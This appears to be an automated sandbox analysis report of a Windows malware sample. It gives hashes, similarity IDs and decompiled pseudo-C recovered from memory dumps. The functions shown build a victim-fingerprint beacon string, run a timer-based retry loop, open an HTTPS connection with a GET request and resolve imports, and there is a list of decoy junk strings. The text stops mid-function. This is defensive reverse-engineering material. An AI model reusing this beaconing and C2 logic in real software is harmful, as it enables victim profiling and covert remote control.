Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: b0817a4d7995d2d54d5dca02d09090182b82eea75111cbe0253863c68f75c943
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: FBF01CB690020CBFEB11DFA5CC89CAFBBBDEB442A4B104939B552E1190D6319E489B60

Uniqueness

Uniqueness Score: -1.00%

Function 00401703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401703(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401715
0x0040171b
0x00401729
0x00401730
0x00401735
0x0040173b
0x00000000
0x0040173c
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 5d5daab65626f5a8b20b58ce6b1aa041d559c67da48c763f4c54447031275def
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 10F037B590020CFFDB119FA5CC85CAFBBBDEB44394B10493AF152E20A0D6309E499B61

Uniqueness

Uniqueness Score: -1.00%

Function 03C49BF1, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E03C49BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				void* _t57;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x3c4d018; // 0xf7ab99a1
				asm("bswap eax");
				_t27 =  *0x3c4d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x3c4d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x3c4d00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x3c4d2a8; // 0xcaa5a8
				_t3 = _t30 + 0x3c4e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x3c4d02c,  *0x3c4d004, _t25);
				_t33 = E03C43288();
				_t34 =  *0x3c4d2a8; // 0xcaa5a8
				_t4 = _t34 + 0x3c4e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E03C4831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x3c4d2a8; // 0xcaa5a8
					_t6 = _t83 + 0x3c4e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x3c4d238, 0, _t96);
				}
				_t97 = E03C49267();
				if(_t97 != 0) {
					_t78 =  *0x3c4d2a8; // 0xcaa5a8
					_t8 = _t78 + 0x3c4e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x3c4d238, 0, _t97);
				}
				_t98 =  *0x3c4d32c; // 0x48f95b0
				_a32 = E03C4284E(0x3c4d00a, _t98 + 4);
				_t42 =  *0x3c4d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x3c4d2a8; // 0xcaa5a8
					_t11 = _t74 + 0x3c4e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x3c4d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x3c4d2a8; // 0xcaa5a8
					_t13 = _t71 + 0x3c4e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x3c4d238, 0, 0x800);
					if(_t100 != 0) {
						E03C43239(GetTickCount());
						_t50 =  *0x3c4d32c; // 0x48f95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x3c4d32c; // 0x48f95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x3c4d32c; // 0x48f95b0
						_t57 = E03C47B8D(1, _t95, _t105,  *_t56); // executed
						_t103 = _t57;
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x3c4c28c);
							_push(_t103);
							_t62 = E03C4A677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E03C4933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E03C45433();
								}
								HeapFree( *0x3c4d238, 0, _v44);
							}
							RtlFreeHeap( *0x3c4d238, 0, _t103); // executed
						}
						RtlFreeHeap( *0x3c4d238, 0, _t100); // executed
					}
					HeapFree( *0x3c4d238, 0, _a24);
				}
				RtlFreeHeap( *0x3c4d238, 0, _t105); // executed
				return _a4;
			}

0x03c49bf1
0x03c49bf1
0x03c49bf1
0x03c49bf6
0x03c49bfc
0x03c49c06
0x03c49c08
0x03c49c08
0x03c49c15
0x03c49c20
0x03c49c23
0x03c49c2e
0x03c49c31
0x03c49c36
0x03c49c39
0x03c49c3e
0x03c49c41
0x03c49c4d
0x03c49c5a
0x03c49c5c
0x03c49c62
0x03c49c67
0x03c49c72
0x03c49c74
0x03c49c77
0x03c49c79
0x03c49c7e
0x03c49c82
0x03c49c84
0x03c49c89
0x03c49c95
0x03c49c97
0x03c49ca3
0x03c49ca5
0x03c49ca5
0x03c49cb0
0x03c49cb4
0x03c49cb6
0x03c49cbb
0x03c49cc7
0x03c49cc9
0x03c49cd5
0x03c49cd7
0x03c49cd7
0x03c49cdd
0x03c49cf0
0x03c49cf4
0x03c49cfb
0x03c49cfe
0x03c49d03
0x03c49d0e
0x03c49d10
0x03c49d13
0x03c49d13
0x03c49d15
0x03c49d1c
0x03c49d1f
0x03c49d24
0x03c49d2e
0x03c49d30
0x03c49d38
0x03c49d51
0x03c49d55
0x03c49d61
0x03c49d66
0x03c49d6f
0x03c49d80
0x03c49d84
0x03c49d8d
0x03c49d93
0x03c49d9b
0x03c49da0
0x03c49dad
0x03c49db3
0x03c49dbf
0x03c49dc5
0x03c49dc6
0x03c49dcb
0x03c49dd1
0x03c49dd7
0x03c49dde
0x03c49de5
0x03c49deb
0x03c49df2
0x03c49df6
0x03c49e01
0x03c49e06
0x03c49e0c
0x03c49e15
0x03c49e15
0x03c49e26
0x03c49e26
0x03c49e35
0x03c49e35
0x03c49e44
0x03c49e44
0x03c49e56
0x03c49e56
0x03c49e65
0x03c49e76

APIs

GetTickCount.KERNEL32 ref: 03C49C08
wsprintfA.USER32 ref: 03C49C55
wsprintfA.USER32 ref: 03C49C72
wsprintfA.USER32 ref: 03C49C95
HeapFree.KERNEL32(00000000,00000000), ref: 03C49CA5
wsprintfA.USER32 ref: 03C49CC7
HeapFree.KERNEL32(00000000,00000000), ref: 03C49CD7
wsprintfA.USER32 ref: 03C49D0E
wsprintfA.USER32 ref: 03C49D2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03C49D4B
GetTickCount.KERNEL32 ref: 03C49D5B
RtlEnterCriticalSection.NTDLL(048F9570), ref: 03C49D6F
RtlLeaveCriticalSection.NTDLL(048F9570), ref: 03C49D8D

Part of subcall function 03C47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,03C49DA0,?,048F95B0), ref: 03C47BB8
Part of subcall function 03C47B8D: lstrlen.KERNEL32(?,?,?,03C49DA0,?,048F95B0), ref: 03C47BC0
Part of subcall function 03C47B8D: strcpy.NTDLL ref: 03C47BD7
Part of subcall function 03C47B8D: lstrcat.KERNEL32(00000000,?), ref: 03C47BE2
Part of subcall function 03C47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03C49DA0,?,048F95B0), ref: 03C47BFF

StrTrimA.SHLWAPI(00000000,03C4C28C,?,048F95B0), ref: 03C49DBF

Part of subcall function 03C4A677: lstrlen.KERNEL32(048F9BF8,00000000,00000000,7691C740,03C49DCB,00000000), ref: 03C4A687
Part of subcall function 03C4A677: lstrlen.KERNEL32(?), ref: 03C4A68F
Part of subcall function 03C4A677: lstrcpy.KERNEL32(00000000,048F9BF8), ref: 03C4A6A3
Part of subcall function 03C4A677: lstrcat.KERNEL32(00000000,?), ref: 03C4A6AE

lstrcpy.KERNEL32(00000000,?), ref: 03C49DDE
lstrcpy.KERNEL32(00000000,00000000), ref: 03C49DE5
lstrcat.KERNEL32(00000000,?), ref: 03C49DF2
lstrcat.KERNEL32(00000000,00000000), ref: 03C49DF6

Part of subcall function 03C4933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 03C493EC

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 03C49E26
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 03C49E35
RtlFreeHeap.NTDLL(00000000,00000000,?,048F95B0), ref: 03C49E44
HeapFree.KERNEL32(00000000,00000000), ref: 03C49E56
RtlFreeHeap.NTDLL(00000000,?), ref: 03C49E65

Strings

Ut, xrefs: 03C49CA5, 03C49CD7, 03C49E26, 03C49E35, 03C49E44, 03C49E56, 03C49E65

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID: Ut
API String ID: 3080378247-8415677
Opcode ID: 4867f8458d65f12f37be7edd44e7c824321e72bc04bcfa7a9f15c57a025db28f
Instruction ID: 1a92da509ba98a22b6220ecccfd2266fd3bfbfcdd4dcbd0e9de4903e7ec56fec
Opcode Fuzzy Hash: 4867f8458d65f12f37be7edd44e7c824321e72bc04bcfa7a9f15c57a025db28f
Instruction Fuzzy Hash: 62619D79500200AFC721FBA8EC48F5BBBE8EB48750F054614F90ADB266DB35ED069B65

Uniqueness

Uniqueness Score: -1.00%

Function 0042F367, Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 679COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042F5D8

Strings

xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F962
Regefiri, xrefs: 0042F642
ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F6B3
furafizasuyesipebokevocejirijan, xrefs: 0042FA07
mikujukezicuharu, xrefs: 0042FA0C
\H, xrefs: 0042F90D
geceyuhocavanino goruyitozekitapopit, xrefs: 0042F6C9
Vefu mif kaxigija puhirege puwuf, xrefs: 0042F638
Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F63D
zijiwe, xrefs: 0042F92E
iyeg xogahes yoxohavit jobikuz, xrefs: 0042F6AE
pemahu, xrefs: 0042F5E9
mecevituxe, xrefs: 0042FA02
"Y?, xrefs: 0042F982
dunuviwujamenopigomareg, xrefs: 0042F6A7
zetipabobutobawekicugi, xrefs: 0042F9FD
Xegixaze, xrefs: 0042F6B8

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset
String ID: "Y?$Hagavete buyihexinag remibumepupabo gojokekisila$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$dunuviwujamenopigomareg$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
API String ID: 2102423945-1989479481
Opcode ID: 1ddb4d7210940c1491fd8fe58ef9019d2aa1554252fe40fd7d9ceb87ca23e2d3
Instruction ID: 697e465249839b5e8501a248803829993e3016da6a60571395f8843383720db3
Opcode Fuzzy Hash: 1ddb4d7210940c1491fd8fe58ef9019d2aa1554252fe40fd7d9ceb87ca23e2d3
Instruction Fuzzy Hash: 3F324F71249350BFE3209BA0EE49FDB7BA8EF89741F004529F34AE51A0DBB45544CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 03C47C3D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E03C47C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				long _t67;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x3c4d240);
					_v20 = 0;
					_v16 = 0;
					L03C4AF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x3c4d26c; // 0x1ac
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x3c4d24c = 5;
						} else {
							_t68 = E03C45319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x3c4d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E03C42C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E03C49870(_t72, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x3c4d244);
							goto L21;
						} else {
							__eflags =  *0x3c4d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E03C45433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x3c4d248);
								L21:
								L03C4AF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0x3c4d238, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x03c47c3d
0x03c47c4f
0x03c47c52
0x03c47c5e
0x03c47c64
0x03c47c69
0x03c47dd0
0x03c47c6f
0x03c47c6f
0x03c47c71
0x03c47c76
0x03c47c77
0x03c47c7d
0x03c47c80
0x03c47c83
0x03c47c91
0x03c47c9c
0x03c47c9f
0x03c47ca1
0x03c47cae
0x03c47cb8
0x03c47cba
0x03c47cbf
0x03c47cc4
0x03c47ccf
0x03c47ccf
0x03c47cc6
0x03c47cc6
0x03c47ccd
0x00000000
0x00000000
0x03c47ccd
0x03c47cd9
0x00000000
0x03c47cdc
0x03c47ce0
0x03c47ceb
0x03c47ceb
0x03c47cf2
0x03c47cfb
0x03c47d02
0x03c47d0b
0x03c47d0e
0x03c47d11
0x03c47d16
0x03c47d1b
0x00000000
0x00000000
0x03c47d1d
0x03c47d20
0x03c47d23
0x03c47d26
0x00000000
0x03c47d28
0x03c47d32
0x03c47d37
0x03c47d37
0x00000000
0x03c47d65
0x03c47d65
0x03c47d6a
0x03c47d89
0x03c47d8b
0x03c47d90
0x03c47d91
0x00000000
0x03c47d6c
0x03c47d6c
0x03c47d72
0x00000000
0x03c47d74
0x03c47d74
0x03c47d79
0x03c47d7b
0x03c47d80
0x03c47d81
0x03c47d97
0x03c47d97
0x03c47d9f
0x03c47daa
0x03c47dad
0x03c47db8
0x03c47dba
0x03c47dbd
0x03c47dbf
0x00000000
0x03c47dc5
0x00000000
0x03c47dc5
0x03c47dbf
0x03c47d72
0x00000000
0x03c47d6a
0x03c47d3a
0x03c47d3c
0x03c47d3f
0x03c47d40
0x03c47d40
0x03c47d44
0x03c47d4e
0x03c47d4e
0x03c47d54
0x03c47d57
0x03c47d57
0x03c47d5d
0x03c47d5d
0x03c47dda
0x00000000

APIs

memset.NTDLL ref: 03C47C52
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03C47C5E
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03C47C83
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 03C47C9F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03C47CB8
RtlFreeHeap.NTDLL(00000000,00000000), ref: 03C47D4E
CloseHandle.KERNEL32(?), ref: 03C47D5D
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 03C47D97
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,03C4312C,?), ref: 03C47DAD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03C47DB8

Part of subcall function 03C45319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,048F9368,00000000,?,74E5F710,00000000,74E5F730), ref: 03C45368
Part of subcall function 03C45319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,048F93A0,?,00000000,30314549,00000014,004F0053,048F935C), ref: 03C45405
Part of subcall function 03C45319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,03C47CCB), ref: 03C45417

GetLastError.KERNEL32 ref: 03C47DCA

Strings

Ut, xrefs: 03C47D4E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut
API String ID: 3521023985-8415677
Opcode ID: 5f097be60a6244a1396b7b40394ffbdc276528b03e66fc4f259372780d2732ab
Instruction ID: b6f0ed3ab93cd2acdd0c82a6dc4728bb5a9bb6afabcbce1acc9546a20f035fd7
Opcode Fuzzy Hash: 5f097be60a6244a1396b7b40394ffbdc276528b03e66fc4f259372780d2732ab
Instruction Fuzzy Hash: 21516CB5901228BFDB20EF95DC44EEEBFB8EF49720F148615F421EA194D7709A40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A85C, Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E03C4A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E03C41525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E03C48B22(_t56);
					} else {
						E03C48B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E03C4A7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E03C429C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x3c4d2a8; // 0xcaa5a8
						_t15 = _t59 + 0x3c4e743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x03c4a85c
0x03c4a85c
0x03c4a867
0x03c4a86e
0x03c4a876
0x03c4a880
0x03c4a886
0x03c4a899
0x03c4a8a9
0x03c4a89b
0x03c4a89e
0x03c4a8a3
0x03c4a8a3
0x03c4a899
0x03c4a8b9
0x03c4a8bf
0x03c4a8c4
0x03c4a9b0
0x00000000
0x03c4a8df
0x03c4a8e2
0x03c4a8f8
0x03c4a8fe
0x03c4a903
0x03c4a92b
0x03c4a93e
0x03c4a948
0x03c4a94b
0x03c4a951
0x03c4a956
0x00000000
0x00000000
0x03c4a95a
0x03c4a966
0x03c4a977
0x03c4a979
0x03c4a98a
0x03c4a98a
0x03c4a99a
0x00000000
0x03c4a9ac
0x00000000
0x03c4a9ac
0x00000000
0x00000000
0x00000000
0x03c4a903

APIs

lstrlen.KERNEL32(?,00000008,74E04D40), ref: 03C4A86E

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 03C4A891
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 03C4A8B9
InternetSetStatusCallback.WININET(00000000,03C4A7F1), ref: 03C4A8D0
ResetEvent.KERNEL32(?), ref: 03C4A8E2
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 03C4A8F8
GetLastError.KERNEL32 ref: 03C4A905
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 03C4A94B
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 03C4A969
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 03C4A98A
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 03C4A996
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 03C4A9A6
GetLastError.KERNEL32 ref: 03C4A9B0

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID:
API String ID: 2290446683-0
Opcode ID: 78a7c75d4b2d874398e1d20751afa7053021d7f5f63affc61633d759877c1e99
Instruction ID: 81df2a1baaca71f0dadcfd1ff26ba0cd7968b2022153fc4b29af9dbae3ae490f
Opcode Fuzzy Hash: 78a7c75d4b2d874398e1d20751afa7053021d7f5f63affc61633d759877c1e99
Instruction Fuzzy Hash: BB416D79540204BFDB31EFA1DC88E9BBABDEB89710B154929F943D5191D731EA44CA20

Uniqueness

Uniqueness Score: -1.00%

Function 03C4AC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E03C4AC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x3c40000;
				_t115 = _t139[3] + 0x3c40000;
				_t131 = _t139[4] + 0x3c40000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x3c40000;
				_v16 = _t139[5] + 0x3c40000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x3c40002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
